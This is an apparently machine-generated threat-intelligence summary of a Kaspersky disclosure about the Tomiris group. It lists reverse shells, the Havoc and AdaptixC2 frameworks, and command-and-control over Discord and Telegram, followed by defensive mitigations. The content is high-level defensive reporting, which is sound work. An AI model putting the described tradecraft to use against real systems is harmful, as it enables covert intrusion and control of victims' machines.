Full Report
Kaspersky discloses new tools and techniques discovered in 2025 Tomiris activities: multi-language reverse shells, Havoc and AdaptixC2 open-source frameworks, communications via Discord and Telegram.
Analysis Summary
# Threat Actor: Tomiris
## Attribution & Identity
The threat actor is identified as **Tomiris**. No specific attribution beyond the name is provided in the context snippet.
## Activity Summary
The summary describes the disclosure of new tools and techniques associated with Tomiris activities discovered in 2025 by Kaspersky.
## Tactics, Techniques & Procedures
- Use of multi-language reverse shells.
- Utilization of the open-source frameworks **Havoc** and **AdaptixC2**.
- Communications conducted via **Discord** and **Telegram**.
## Targeting
- **Sectors:** Not specified in the provided context.
- **Geography:** Not specified in the provided context.
- **Victims:** Not specified in the provided context.
## Tools & Infrastructure
- **Malware families used:** References the use of multi-language reverse shells.
- **Infrastructure (C2, domains, IPs):**
- Command and Control (C2) utilizes **Discord** and **Telegram**.
- Implied use of **Havoc C2** and **AdaptixC2** frameworks for C2 infrastructure.
## Implications
Tomiris is actively developing and deploying new capabilities, including leveraging publicly available frameworks (Havoc, AdaptixC2) alongside custom/modified tools (multi-language reverse shells). The reliance on common communication platforms like Discord and Telegram suggests a focus on blending into legitimate traffic or exploiting established communication channels for C2.
## Mitigations
- Monitor network traffic for C2 communications over non-traditional ports/protocols associated with Discord and Telegram services.
- Implement strict egress filtering if possible, or closely monitor activity patterns originating from systems communicating with known Discord/Telegram infrastructure for command traffic.
- Scrutinize systems for the presence and execution of capabilities provided by the Havoc and AdaptixC2 frameworks.
- Enhance endpoint detection to identify custom or novel reverse shell activity, particularly those supporting multiple languages.